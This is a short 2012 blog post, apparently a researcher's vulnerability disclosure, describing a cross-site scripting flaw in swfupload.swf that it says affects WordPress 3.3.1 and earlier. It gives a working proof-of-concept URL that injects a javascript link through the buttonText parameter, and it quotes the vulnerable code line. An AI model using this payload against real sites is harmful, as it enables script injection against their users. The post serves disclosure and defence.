31 December 2012

Category: Hacks
31 December 2012,
 0

Hi,

Just want to share my finding,

I found another XSS Vulnerability in swfupload.swf

PoC:

 

 

http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E

swfuploadxss

 

Vulnerable Parameter:

buttonText

Vulnerable Code:

this.buttonTextField.htmlText = this.buttonText;

(For WordPress Fans, Works on Version 3.3.1 and below)

By @Nirgoldshlager

Leave a Reply

Your email address will not be published. Required fields are marked *